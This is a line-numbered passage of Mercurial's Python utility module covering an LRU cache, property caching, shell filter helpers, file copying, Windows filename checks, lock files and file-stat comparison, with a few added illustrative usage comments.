782 782 node = self._cache.get(k)
783 783 # Replace existing value and mark as newest.
784 784 if node is not None:
785 785 node.value = v
786 786 self._movetohead(node)
787 787 return
788 788
789 789 if self._size < self._capacity:
790 790 node = self._addcapacity()
791 791 else:
792 792 # Grab the last/oldest item.
793 793 node = self._head.prev
794 794
795 795 # At capacity. Kill the old entry.
796 796 if node.key is not _notset:
797 797 del self._cache[node.key]
798 798
799 799 node.key = k
800 800 node.value = v
801 801 self._cache[k] = node
802 802 # And mark it as newest entry. No need to adjust order since it
803 803 # is already self._head.prev.
804 804 self._head = node
805 805
806 806 def __delitem__(self, k):
807 807 node = self._cache.pop(k)
808 808 node.markempty()
809 809
810 810 # Temporarily mark as newest item before re-adjusting head to make
811 811 # this node the oldest item.
812 812 self._movetohead(node)
813 813 self._head = node.next
814 814
815 815 # Additional dict methods.
816 816
817 817 def get(self, k, default=None):
818 818 try:
819 819 return self._cache[k].value
820 820 except KeyError:
821 821 return default
822 822
823 823 def clear(self):
824 824 n = self._head
825 825 while n.key is not _notset:
826 826 n.markempty()
827 827 n = n.next
828 828
829 829 self._cache.clear()
830 830
831 831 def copy(self):
832 832 result = lrucachedict(self._capacity)
833 833 n = self._head.prev
834 834 # Iterate in oldest-to-newest order, so the copy has the right ordering
835 835 for i in range(len(self._cache)):
836 836 result[n.key] = n.value
837 837 n = n.prev
838 838 return result
839 839
840 840 def _movetohead(self, node):
841 841 """Mark a node as the newest, making it the new head.
842 842
843 843 When a node is accessed, it becomes the freshest entry in the LRU
844 844 list, which is denoted by self._head.
845 845
846 846 Visually, let's make ``N`` the new head node (* denotes head):
847 847
848 848 previous/oldest <-> head <-> next/next newest
849 849
850 850 ----<->--- A* ---<->-----
851 851 | |
852 852 E <-> D <-> N <-> C <-> B
853 853
854 854 To:
855 855
856 856 ----<->--- N* ---<->-----
857 857 | |
858 858 E <-> D <-> C <-> B <-> A
859 859
860 860 This requires the following moves:
861 861
862 862 C.next = D (node.prev.next = node.next)
863 863 D.prev = C (node.next.prev = node.prev)
864 864 E.next = N (head.prev.next = node)
865 865 N.prev = E (node.prev = head.prev)
866 866 N.next = A (node.next = head)
867 867 A.prev = N (head.prev = node)
868 868 """
869 869 head = self._head
870 870 # C.next = D
871 871 node.prev.next = node.next
872 872 # D.prev = C
873 873 node.next.prev = node.prev
874 874 # N.prev = E
875 875 node.prev = head.prev
876 876 # N.next = A
877 877 # It is tempting to do just "head" here, however if node is
878 878 # adjacent to head, this will do bad things.
879 879 node.next = head.prev.next
880 880 # E.next = N
881 881 node.next.prev = node
882 882 # A.prev = N
883 883 node.prev.next = node
884 884
885 885 self._head = node
886 886
887 887 def _addcapacity(self):
888 888 """Add a node to the circular linked list.
889 889
890 890 The new node is inserted before the head node.
891 891 """
892 892 head = self._head
893 893 node = _lrucachenode()
894 894 head.prev.next = node
895 895 node.prev = head.prev
896 896 node.next = head
897 897 head.prev = node
898 898 self._size += 1
899 899 return node
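
# Doctest-style sketch (illustrative only, not part of the original module):
# with a capacity of 2, inserting a third key recycles the least recently
# used entry.
#
#   >>> d = lrucachedict(2)
#   >>> d[b'a'] = 1
#   >>> d[b'b'] = 2
#   >>> d[b'a']        # touch 'a' so 'b' becomes the oldest entry
#   1
#   >>> d[b'c'] = 3    # at capacity: 'b' is evicted
#   >>> b'b' in d, b'a' in d
#   (False, True)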
900 900
901 901 def lrucachefunc(func):
902 902 '''cache most recent results of function calls'''
903 903 cache = {}
904 904 order = collections.deque()
905 905 if func.__code__.co_argcount == 1:
906 906 def f(arg):
907 907 if arg not in cache:
908 908 if len(cache) > 20:
909 909 del cache[order.popleft()]
910 910 cache[arg] = func(arg)
911 911 else:
912 912 order.remove(arg)
913 913 order.append(arg)
914 914 return cache[arg]
915 915 else:
916 916 def f(*args):
917 917 if args not in cache:
918 918 if len(cache) > 20:
919 919 del cache[order.popleft()]
920 920 cache[args] = func(*args)
921 921 else:
922 922 order.remove(args)
923 923 order.append(args)
924 924 return cache[args]
925 925
926 926 return f
927 927
928 928 class propertycache(object):
929 929 def __init__(self, func):
930 930 self.func = func
931 931 self.name = func.__name__
932 932 def __get__(self, obj, type=None):
933 933 result = self.func(obj)
934 934 self.cachevalue(obj, result)
935 935 return result
936 936
937 937 def cachevalue(self, obj, value):
938 938 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
939 939 obj.__dict__[self.name] = value
940 940
941 941 def clearcachedproperty(obj, prop):
942 942 '''clear a cached property value, if one has been set'''
943 943 if prop in obj.__dict__:
944 944 del obj.__dict__[prop]
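
# Illustrative sketch (assumed example, not part of the original module):
# propertycache computes the value on first access and stores it in the
# instance __dict__, so later lookups bypass the descriptor entirely;
# clearcachedproperty() drops the cached value so it is recomputed.
#
#   class repoish(object):
#       @propertycache
#       def expensive(self):
#           return computevalue(self)    # hypothetical helper; runs once
#
#   r = repoish()
#   r.expensive                          # computed and cached
#   r.expensive                          # served from r.__dict__
#   clearcachedproperty(r, 'expensive')  # next access recomputes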
945 945
946 946 def pipefilter(s, cmd):
947 947 '''filter string S through command CMD, returning its output'''
948 948 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
949 949 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
950 950 pout, perr = p.communicate(s)
951 951 return pout
952 952
953 953 def tempfilter(s, cmd):
954 954 '''filter string S through a pair of temporary files with CMD.
955 955 CMD is used as a template to create the real command to be run,
956 956 with the strings INFILE and OUTFILE replaced by the real names of
957 957 the temporary files generated.'''
958 958 inname, outname = None, None
959 959 try:
960 960 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
961 961 fp = os.fdopen(infd, pycompat.sysstr('wb'))
962 962 fp.write(s)
963 963 fp.close()
964 964 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
965 965 os.close(outfd)
966 966 cmd = cmd.replace('INFILE', inname)
967 967 cmd = cmd.replace('OUTFILE', outname)
968 968 code = os.system(cmd)
969 969 if pycompat.sysplatform == 'OpenVMS' and code & 1:
970 970 code = 0
971 971 if code:
972 972 raise Abort(_("command '%s' failed: %s") %
973 973 (cmd, explainexit(code)))
974 974 return readfile(outname)
975 975 finally:
976 976 try:
977 977 if inname:
978 978 os.unlink(inname)
979 979 except OSError:
980 980 pass
981 981 try:
982 982 if outname:
983 983 os.unlink(outname)
984 984 except OSError:
985 985 pass
986 986
987 987 filtertable = {
988 988 'tempfile:': tempfilter,
989 989 'pipe:': pipefilter,
990 990 }
991 991
992 992 def filter(s, cmd):
993 993 "filter a string through a command that transforms its input to its output"
994 994 for name, fn in filtertable.iteritems():
995 995 if cmd.startswith(name):
996 996 return fn(s, cmd[len(name):].lstrip())
997 997 return pipefilter(s, cmd)
998 998
999 999 def binary(s):
1000 1000 """return true if a string is binary data"""
1001 1001 return bool(s and '\0' in s)
1002 1002
1003 1003 def increasingchunks(source, min=1024, max=65536):
1004 1004 '''return no less than min bytes per chunk while data remains,
1005 1005 doubling min after each chunk until it reaches max'''
1006 1006 def log2(x):
1007 1007 if not x:
1008 1008 return 0
1009 1009 i = 0
1010 1010 while x:
1011 1011 x >>= 1
1012 1012 i += 1
1013 1013 return i - 1
1014 1014
1015 1015 buf = []
1016 1016 blen = 0
1017 1017 for chunk in source:
1018 1018 buf.append(chunk)
1019 1019 blen += len(chunk)
1020 1020 if blen >= min:
1021 1021 if min < max:
1022 1022 min = min << 1
1023 1023 nmin = 1 << log2(blen)
1024 1024 if nmin > min:
1025 1025 min = nmin
1026 1026 if min > max:
1027 1027 min = max
1028 1028 yield ''.join(buf)
1029 1029 blen = 0
1030 1030 buf = []
1031 1031 if buf:
1032 1032 yield ''.join(buf)
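
# Doctest-style sketch (illustrative only, not part of the original module):
# small chunks from the source iterator are coalesced into progressively
# larger ones, up to the max chunk size.
#
#   >>> pieces = [b'x' * 512] * 8
#   >>> [len(c) for c in increasingchunks(iter(pieces), min=1024, max=4096)]
#   [1024, 2048, 1024]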
1033 1033
1034 1034 Abort = error.Abort
1035 1035
1036 1036 def always(fn):
1037 1037 return True
1038 1038
1039 1039 def never(fn):
1040 1040 return False
1041 1041
1042 1042 def nogc(func):
1043 1043 """disable garbage collector
1044 1044
1045 1045 Python's garbage collector triggers a GC each time a certain number of
1046 1046 container objects (the number being defined by gc.get_threshold()) are
1047 1047 allocated even when marked not to be tracked by the collector. Tracking has
1048 1048 no effect on when GCs are triggered, only on what objects the GC looks
1049 1049 into. As a workaround, disable GC while building complex (huge)
1050 1050 containers.
1051 1051
1052 1052 This garbage collector issue has been fixed in 2.7. But it still affects
1053 1053 CPython's performance.
1054 1054 """
1055 1055 def wrapper(*args, **kwargs):
1056 1056 gcenabled = gc.isenabled()
1057 1057 gc.disable()
1058 1058 try:
1059 1059 return func(*args, **kwargs)
1060 1060 finally:
1061 1061 if gcenabled:
1062 1062 gc.enable()
1063 1063 return wrapper
1064 1064
1065 1065 if pycompat.ispypy:
1066 1066 # PyPy runs slower with gc disabled
1067 1067 nogc = lambda x: x
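
# Illustrative sketch (assumed example, not part of the original module):
# nogc is meant to decorate functions that build very large containers.
#
#   @nogc
#   def buildindex(entries):
#       return dict((e, i) for i, e in enumerate(entries))
#
# On CPython the collector is disabled for the duration of the call and
# re-enabled afterwards (if it was enabled before); on PyPy the decorator
# is a no-op.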
1068 1068
1069 1069 def pathto(root, n1, n2):
1070 1070 '''return the relative path from one place to another.
1071 1071 root should use os.sep to separate directories
1072 1072 n1 should use os.sep to separate directories
1073 1073 n2 should use "/" to separate directories
1074 1074 returns an os.sep-separated path.
1075 1075
1076 1076 If n1 is a relative path, it's assumed it's
1077 1077 relative to root.
1078 1078 n2 should always be relative to root.
1079 1079 '''
1080 1080 if not n1:
1081 1081 return localpath(n2)
1082 1082 if os.path.isabs(n1):
1083 1083 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1084 1084 return os.path.join(root, localpath(n2))
1085 1085 n2 = '/'.join((pconvert(root), n2))
1086 1086 a, b = splitpath(n1), n2.split('/')
1087 1087 a.reverse()
1088 1088 b.reverse()
1089 1089 while a and b and a[-1] == b[-1]:
1090 1090 a.pop()
1091 1091 b.pop()
1092 1092 b.reverse()
1093 1093 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1094 1094
1095 1095 def mainfrozen():
1096 1096 """return True if we are a frozen executable.
1097 1097
1098 1098 The code supports py2exe (most common, Windows only) and tools/freeze
1099 1099 (portable, not much used).
1100 1100 """
1101 1101 return (safehasattr(sys, "frozen") or # new py2exe
1102 1102 safehasattr(sys, "importers") or # old py2exe
1103 1103 imp.is_frozen(u"__main__")) # tools/freeze
1104 1104
1105 1105 # the location of data files matching the source code
1106 1106 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1107 1107 # executable version (py2exe) doesn't support __file__
1108 1108 datapath = os.path.dirname(pycompat.sysexecutable)
1109 1109 else:
1110 1110 datapath = os.path.dirname(pycompat.fsencode(__file__))
1111 1111
1112 1112 i18n.setdatapath(datapath)
1113 1113
1114 1114 _hgexecutable = None
1115 1115
1116 1116 def hgexecutable():
1117 1117 """return location of the 'hg' executable.
1118 1118
1119 1119 Defaults to $HG or 'hg' in the search path.
1120 1120 """
1121 1121 if _hgexecutable is None:
1122 1122 hg = encoding.environ.get('HG')
1123 1123 mainmod = sys.modules[pycompat.sysstr('__main__')]
1124 1124 if hg:
1125 1125 _sethgexecutable(hg)
1126 1126 elif mainfrozen():
1127 1127 if getattr(sys, 'frozen', None) == 'macosx_app':
1128 1128 # Env variable set by py2app
1129 1129 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1130 1130 else:
1131 1131 _sethgexecutable(pycompat.sysexecutable)
1132 1132 elif (os.path.basename(
1133 1133 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1134 1134 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1135 1135 else:
1136 1136 exe = findexe('hg') or os.path.basename(sys.argv[0])
1137 1137 _sethgexecutable(exe)
1138 1138 return _hgexecutable
1139 1139
1140 1140 def _sethgexecutable(path):
1141 1141 """set location of the 'hg' executable"""
1142 1142 global _hgexecutable
1143 1143 _hgexecutable = path
1144 1144
1145 1145 def _isstdout(f):
1146 1146 fileno = getattr(f, 'fileno', None)
1147 1147 return fileno and fileno() == sys.__stdout__.fileno()
1148 1148
1149 1149 def shellenviron(environ=None):
1150 1150 """return environ with optional override, useful for shelling out"""
1151 1151 def py2shell(val):
1152 1152 'convert python object into string that is useful to shell'
1153 1153 if val is None or val is False:
1154 1154 return '0'
1155 1155 if val is True:
1156 1156 return '1'
1157 1157 return str(val)
1158 1158 env = dict(encoding.environ)
1159 1159 if environ:
1160 1160 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1161 1161 env['HG'] = hgexecutable()
1162 1162 return env
1163 1163
1164 1164 def system(cmd, environ=None, cwd=None, out=None):
1165 1165 '''enhanced shell command execution.
1166 1166 run with environment maybe modified, maybe in different dir.
1167 1167
1168 1168 if out is specified, it is assumed to be a file-like object that has a
1169 1169 write() method. stdout and stderr will be redirected to out.'''
1170 1170 try:
1171 1171 stdout.flush()
1172 1172 except Exception:
1173 1173 pass
1174 1174 cmd = quotecommand(cmd)
1175 1175 env = shellenviron(environ)
1176 1176 if out is None or _isstdout(out):
1177 1177 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1178 1178 env=env, cwd=cwd)
1179 1179 else:
1180 1180 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1181 1181 env=env, cwd=cwd, stdout=subprocess.PIPE,
1182 1182 stderr=subprocess.STDOUT)
1183 1183 for line in iter(proc.stdout.readline, ''):
1184 1184 out.write(line)
1185 1185 proc.wait()
1186 1186 rc = proc.returncode
1187 1187 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1188 1188 rc = 0
1189 1189 return rc
1190 1190
1191 1191 def checksignature(func):
1192 1192 '''wrap a function with code to check for calling errors'''
1193 1193 def check(*args, **kwargs):
1194 1194 try:
1195 1195 return func(*args, **kwargs)
1196 1196 except TypeError:
1197 1197 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1198 1198 raise error.SignatureError
1199 1199 raise
1200 1200
1201 1201 return check
1202 1202
1203 1203 # a whitelist of known filesystems where hardlinks work reliably
1204 1204 _hardlinkfswhitelist = {
1205 1205 'btrfs',
1206 1206 'ext2',
1207 1207 'ext3',
1208 1208 'ext4',
1209 1209 'hfs',
1210 1210 'jfs',
1211 1211 'NTFS',
1212 1212 'reiserfs',
1213 1213 'tmpfs',
1214 1214 'ufs',
1215 1215 'xfs',
1216 1216 'zfs',
1217 1217 }
1218 1218
1219 1219 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1220 1220 '''copy a file, preserving mode and optionally other stat info like
1221 1221 atime/mtime
1222 1222
1223 1223 checkambig argument is used with filestat, and is useful only if
1224 1224 destination file is guarded by any lock (e.g. repo.lock or
1225 1225 repo.wlock).
1226 1226
1227 1227 copystat and checkambig should be exclusive.
1228 1228 '''
1229 1229 assert not (copystat and checkambig)
1230 1230 oldstat = None
1231 1231 if os.path.lexists(dest):
1232 1232 if checkambig:
1233 1233 oldstat = checkambig and filestat.frompath(dest)
1234 1234 unlink(dest)
1235 1235 if hardlink:
1236 1236 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1237 1237 # unless we are confident that dest is on a whitelisted filesystem.
1238 1238 try:
1239 1239 fstype = getfstype(os.path.dirname(dest))
1240 1240 except OSError:
1241 1241 fstype = None
1242 1242 if fstype not in _hardlinkfswhitelist:
1243 1243 hardlink = False
1244 1244 if hardlink:
1245 1245 try:
1246 1246 oslink(src, dest)
1247 1247 return
1248 1248 except (IOError, OSError):
1249 1249 pass # fall back to normal copy
1250 1250 if os.path.islink(src):
1251 1251 os.symlink(os.readlink(src), dest)
1252 1252 # copytime is ignored for symlinks, but in general copytime isn't needed
1253 1253 # for them anyway
1254 1254 else:
1255 1255 try:
1256 1256 shutil.copyfile(src, dest)
1257 1257 if copystat:
1258 1258 # copystat also copies mode
1259 1259 shutil.copystat(src, dest)
1260 1260 else:
1261 1261 shutil.copymode(src, dest)
1262 1262 if oldstat and oldstat.stat:
1263 1263 newstat = filestat.frompath(dest)
1264 1264 if newstat.isambig(oldstat):
1265 1265 # stat of copied file is ambiguous to original one
1266 1266 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1267 1267 os.utime(dest, (advanced, advanced))
1268 1268 except shutil.Error as inst:
1269 1269 raise Abort(str(inst))
1270 1270
1271 1271 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1272 1272 """Copy a directory tree using hardlinks if possible."""
1273 1273 num = 0
1274 1274
1275 1275 gettopic = lambda: hardlink and _('linking') or _('copying')
1276 1276
1277 1277 if os.path.isdir(src):
1278 1278 if hardlink is None:
1279 1279 hardlink = (os.stat(src).st_dev ==
1280 1280 os.stat(os.path.dirname(dst)).st_dev)
1281 1281 topic = gettopic()
1282 1282 os.mkdir(dst)
1283 1283 for name, kind in listdir(src):
1284 1284 srcname = os.path.join(src, name)
1285 1285 dstname = os.path.join(dst, name)
1286 1286 def nprog(t, pos):
1287 1287 if pos is not None:
1288 1288 return progress(t, pos + num)
1289 1289 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1290 1290 num += n
1291 1291 else:
1292 1292 if hardlink is None:
1293 1293 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1294 1294 os.stat(os.path.dirname(dst)).st_dev)
1295 1295 topic = gettopic()
1296 1296
1297 1297 if hardlink:
1298 1298 try:
1299 1299 oslink(src, dst)
1300 1300 except (IOError, OSError):
1301 1301 hardlink = False
1302 1302 shutil.copy(src, dst)
1303 1303 else:
1304 1304 shutil.copy(src, dst)
1305 1305 num += 1
1306 1306 progress(topic, num)
1307 1307 progress(topic, None)
1308 1308
1309 1309 return hardlink, num
1310 1310
1311 1311 _winreservednames = {
1312 1312 'con', 'prn', 'aux', 'nul',
1313 1313 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1314 1314 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1315 1315 }
1316 1316 _winreservedchars = ':*?"<>|'
1317 1317 def checkwinfilename(path):
1318 1318 r'''Check that the base-relative path is a valid filename on Windows.
1319 1319 Returns None if the path is ok, or a UI string describing the problem.
1320 1320
1321 1321 >>> checkwinfilename(b"just/a/normal/path")
1322 1322 >>> checkwinfilename(b"foo/bar/con.xml")
1323 1323 "filename contains 'con', which is reserved on Windows"
1324 1324 >>> checkwinfilename(b"foo/con.xml/bar")
1325 1325 "filename contains 'con', which is reserved on Windows"
1326 1326 >>> checkwinfilename(b"foo/bar/xml.con")
1327 1327 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1328 1328 "filename contains 'AUX', which is reserved on Windows"
1329 1329 >>> checkwinfilename(b"foo/bar/bla:.txt")
1330 1330 "filename contains ':', which is reserved on Windows"
1331 1331 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1332 1332 "filename contains '\\x07', which is invalid on Windows"
1333 1333 >>> checkwinfilename(b"foo/bar/bla ")
1334 1334 "filename ends with ' ', which is not allowed on Windows"
1335 1335 >>> checkwinfilename(b"../bar")
1336 1336 >>> checkwinfilename(b"foo\\")
1337 1337 "filename ends with '\\', which is invalid on Windows"
1338 1338 >>> checkwinfilename(b"foo\\/bar")
1339 1339 "directory name ends with '\\', which is invalid on Windows"
1340 1340 '''
1341 1341 if path.endswith('\\'):
1342 1342 return _("filename ends with '\\', which is invalid on Windows")
1343 1343 if '\\/' in path:
1344 1344 return _("directory name ends with '\\', which is invalid on Windows")
1345 1345 for n in path.replace('\\', '/').split('/'):
1346 1346 if not n:
1347 1347 continue
1348 1348 for c in _filenamebytestr(n):
1349 1349 if c in _winreservedchars:
1350 1350 return _("filename contains '%s', which is reserved "
1351 1351 "on Windows") % c
1352 1352 if ord(c) <= 31:
1353 1353 return _("filename contains '%s', which is invalid "
1354 1354 "on Windows") % escapestr(c)
1355 1355 base = n.split('.')[0]
1356 1356 if base and base.lower() in _winreservednames:
1357 1357 return _("filename contains '%s', which is reserved "
1358 1358 "on Windows") % base
1359 1359 t = n[-1:]
1360 1360 if t in '. ' and n not in '..':
1361 1361 return _("filename ends with '%s', which is not allowed "
1362 1362 "on Windows") % t
1363 1363
1364 1364 if pycompat.iswindows:
1365 1365 checkosfilename = checkwinfilename
1366 1366 timer = time.clock
1367 1367 else:
1368 1368 checkosfilename = platform.checkosfilename
1369 1369 timer = time.time
1370 1370
1371 1371 if safehasattr(time, "perf_counter"):
1372 1372 timer = time.perf_counter
1373 1373
1374 1374 def makelock(info, pathname):
1375 1375 try:
1376 1376 return os.symlink(info, pathname)
1377 1377 except OSError as why:
1378 1378 if why.errno == errno.EEXIST:
1379 1379 raise
1380 1380 except AttributeError: # no symlink in os
1381 1381 pass
1382 1382
1383 1383 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1384 1384 os.write(ld, info)
1385 1385 os.close(ld)
1386 1386
1387 1387 def readlock(pathname):
1388 1388 try:
1389 1389 return os.readlink(pathname)
1390 1390 except OSError as why:
1391 1391 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1392 1392 raise
1393 1393 except AttributeError: # no symlink in os
1394 1394 pass
1395 1395 fp = posixfile(pathname)
1396 1396 r = fp.read()
1397 1397 fp.close()
1398 1398 return r
1399 1399
1400 1400 def fstat(fp):
1401 1401 '''stat file object that may not have fileno method.'''
1402 1402 try:
1403 1403 return os.fstat(fp.fileno())
1404 1404 except AttributeError:
1405 1405 return os.stat(fp.name)
1406 1406
1407 1407 # File system features
1408 1408
1409 1409 def fscasesensitive(path):
1410 1410 """
1411 1411 Return true if the given path is on a case-sensitive filesystem
1412 1412
1413 1413 Requires a path (like /foo/.hg) ending with a foldable final
1414 1414 directory component.
1415 1415 """
1416 1416 s1 = os.lstat(path)
1417 1417 d, b = os.path.split(path)
1418 1418 b2 = b.upper()
1419 1419 if b == b2:
1420 1420 b2 = b.lower()
1421 1421 if b == b2:
1422 1422 return True # no evidence against case sensitivity
1423 1423 p2 = os.path.join(d, b2)
1424 1424 try:
1425 1425 s2 = os.lstat(p2)
1426 1426 if s2 == s1:
1427 1427 return False
1428 1428 return True
1429 1429 except OSError:
1430 1430 return True
1431 1431
1432 1432 try:
1433 1433 import re2
1434 1434 _re2 = None
1435 1435 except ImportError:
1436 1436 _re2 = False
1437 1437
1438 1438 class _re(object):
1439 1439 def _checkre2(self):
1440 1440 global _re2
1441 1441 try:
1442 1442 # check if match works, see issue3964
1443 1443 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1444 1444 except ImportError:
1445 1445 _re2 = False
1446 1446
1447 1447 def compile(self, pat, flags=0):
1448 1448 '''Compile a regular expression, using re2 if possible
1449 1449
1450 1450 For best performance, use only re2-compatible regexp features. The
1451 1451 only flags from the re module that are re2-compatible are
1452 1452 IGNORECASE and MULTILINE.'''
1453 1453 if _re2 is None:
1454 1454 self._checkre2()
1455 1455 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1456 1456 if flags & remod.IGNORECASE:
1457 1457 pat = '(?i)' + pat
1458 1458 if flags & remod.MULTILINE:
1459 1459 pat = '(?m)' + pat
1460 1460 try:
1461 1461 return re2.compile(pat)
1462 1462 except re2.error:
1463 1463 pass
1464 1464 return remod.compile(pat, flags)
1465 1465
1466 1466 @propertycache
1467 1467 def escape(self):
1468 1468 '''Return the version of escape corresponding to self.compile.
1469 1469
1470 1470 This is imperfect because whether re2 or re is used for a particular
1471 1471 function depends on the flags, etc, but it's the best we can do.
1472 1472 '''
1473 1473 global _re2
1474 1474 if _re2 is None:
1475 1475 self._checkre2()
1476 1476 if _re2:
1477 1477 return re2.escape
1478 1478 else:
1479 1479 return remod.escape
1480 1480
1481 1481 re = _re()
1482 1482
1483 1483 _fspathcache = {}
1484 1484 def fspath(name, root):
1485 1485 '''Get name in the case stored in the filesystem
1486 1486
1487 1487 The name should be relative to root, and be normcase-ed for efficiency.
1488 1488
1489 1489 Note that this function is unnecessary, and should not be
1490 1490 called, for case-sensitive filesystems (simply because it's expensive).
1491 1491
1492 1492 The root should be normcase-ed, too.
1493 1493 '''
1494 1494 def _makefspathcacheentry(dir):
1495 1495 return dict((normcase(n), n) for n in os.listdir(dir))
1496 1496
1497 1497 seps = pycompat.ossep
1498 1498 if pycompat.osaltsep:
1499 1499 seps = seps + pycompat.osaltsep
1500 1500 # Protect backslashes. This gets silly very quickly.
1501 1501 seps = seps.replace('\\', '\\\\')
1502 1502 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1503 1503 dir = os.path.normpath(root)
1504 1504 result = []
1505 1505 for part, sep in pattern.findall(name):
1506 1506 if sep:
1507 1507 result.append(sep)
1508 1508 continue
1509 1509
1510 1510 if dir not in _fspathcache:
1511 1511 _fspathcache[dir] = _makefspathcacheentry(dir)
1512 1512 contents = _fspathcache[dir]
1513 1513
1514 1514 found = contents.get(part)
1515 1515 if not found:
1516 1516 # retry "once per directory" per "dirstate.walk" which
1517 1517 # may take place for each patch of "hg qpush", for example
1518 1518 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1519 1519 found = contents.get(part)
1520 1520
1521 1521 result.append(found or part)
1522 1522 dir = os.path.join(dir, part)
1523 1523
1524 1524 return ''.join(result)
1525 1525
1526 1526 def checknlink(testfile):
1527 1527 '''check whether hardlink count reporting works properly'''
1528 1528
1529 1529 # testfile may be open, so we need a separate file for checking to
1530 1530 # work around issue2543 (or testfile may get lost on Samba shares)
1531 1531 f1, f2, fp = None, None, None
1532 1532 try:
1533 1533 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1534 1534 suffix='1~', dir=os.path.dirname(testfile))
1535 1535 os.close(fd)
1536 1536 f2 = '%s2~' % f1[:-2]
1537 1537
1538 1538 oslink(f1, f2)
1539 1539 # nlinks() may behave differently for files on Windows shares if
1540 1540 # the file is open.
1541 1541 fp = posixfile(f2)
1542 1542 return nlinks(f2) > 1
1543 1543 except OSError:
1544 1544 return False
1545 1545 finally:
1546 1546 if fp is not None:
1547 1547 fp.close()
1548 1548 for f in (f1, f2):
1549 1549 try:
1550 1550 if f is not None:
1551 1551 os.unlink(f)
1552 1552 except OSError:
1553 1553 pass
1554 1554
1555 1555 def endswithsep(path):
1556 1556 '''Check path ends with os.sep or os.altsep.'''
1557 1557 return (path.endswith(pycompat.ossep)
1558 1558 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1559 1559
1560 1560 def splitpath(path):
1561 1561 '''Split path by os.sep.
1562 1562 Note that this function does not use os.altsep because this is
1563 1563 an alternative to a simple "xxx.split(os.sep)".
1564 1564 It is recommended to use os.path.normpath() before using this
1565 1565 function if needed.'''
1566 1566 return path.split(pycompat.ossep)
1567 1567
1568 1568 def gui():
1569 1569 '''Are we running in a GUI?'''
1570 1570 if pycompat.isdarwin:
1571 1571 if 'SSH_CONNECTION' in encoding.environ:
1572 1572 # handle SSH access to a box where the user is logged in
1573 1573 return False
1574 1574 elif getattr(osutil, 'isgui', None):
1575 1575 # check if a CoreGraphics session is available
1576 1576 return osutil.isgui()
1577 1577 else:
1578 1578 # pure build; use a safe default
1579 1579 return True
1580 1580 else:
1581 1581 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1582 1582
1583 1583 def mktempcopy(name, emptyok=False, createmode=None):
1584 1584 """Create a temporary file with the same contents from name
1585 1585
1586 1586 The permission bits are copied from the original file.
1587 1587
1588 1588 If the temporary file is going to be truncated immediately, you
1589 1589 can use emptyok=True as an optimization.
1590 1590
1591 1591 Returns the name of the temporary file.
1592 1592 """
1593 1593 d, fn = os.path.split(name)
1594 1594 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1595 1595 os.close(fd)
1596 1596 # Temporary files are created with mode 0600, which is usually not
1597 1597 # what we want. If the original file already exists, just copy
1598 1598 # its mode. Otherwise, manually obey umask.
1599 1599 copymode(name, temp, createmode)
1600 1600 if emptyok:
1601 1601 return temp
1602 1602 try:
1603 1603 try:
1604 1604 ifp = posixfile(name, "rb")
1605 1605 except IOError as inst:
1606 1606 if inst.errno == errno.ENOENT:
1607 1607 return temp
1608 1608 if not getattr(inst, 'filename', None):
1609 1609 inst.filename = name
1610 1610 raise
1611 1611 ofp = posixfile(temp, "wb")
1612 1612 for chunk in filechunkiter(ifp):
1613 1613 ofp.write(chunk)
1614 1614 ifp.close()
1615 1615 ofp.close()
1616 1616 except: # re-raises
1617 1617 try:
1618 1618 os.unlink(temp)
1619 1619 except OSError:
1620 1620 pass
1621 1621 raise
1622 1622 return temp
1623 1623
1624 1624 class filestat(object):
1625 1625 """helper to exactly detect changes of a file
1626 1626
1627 1627 The 'stat' attribute is the result of 'os.stat()' if the specified
1628 1628 'path' exists. Otherwise, it is None. This avoids a preparatory
1629 1629 'exists()' check on the caller's side.
1630 1630 """
1631 1631 def __init__(self, stat):
1632 1632 self.stat = stat
1633 1633
1634 1634 @classmethod
1635 1635 def frompath(cls, path):
1636 1636 try:
1637 1637 stat = os.stat(path)
1638 1638 except OSError as err:
1639 1639 if err.errno != errno.ENOENT:
1640 1640 raise
1641 1641 stat = None
1642 1642 return cls(stat)
1643 1643
1644 1644 @classmethod
1645 1645 def fromfp(cls, fp):
1646 1646 stat = os.fstat(fp.fileno())
1647 1647 return cls(stat)
1648 1648
1649 1649 __hash__ = object.__hash__
1650 1650
1651 1651 def __eq__(self, old):
1652 1652 try:
1653 1653 # if ambiguity between stat of new and old file is
1654 1654 # avoided, comparison of size, ctime and mtime is enough
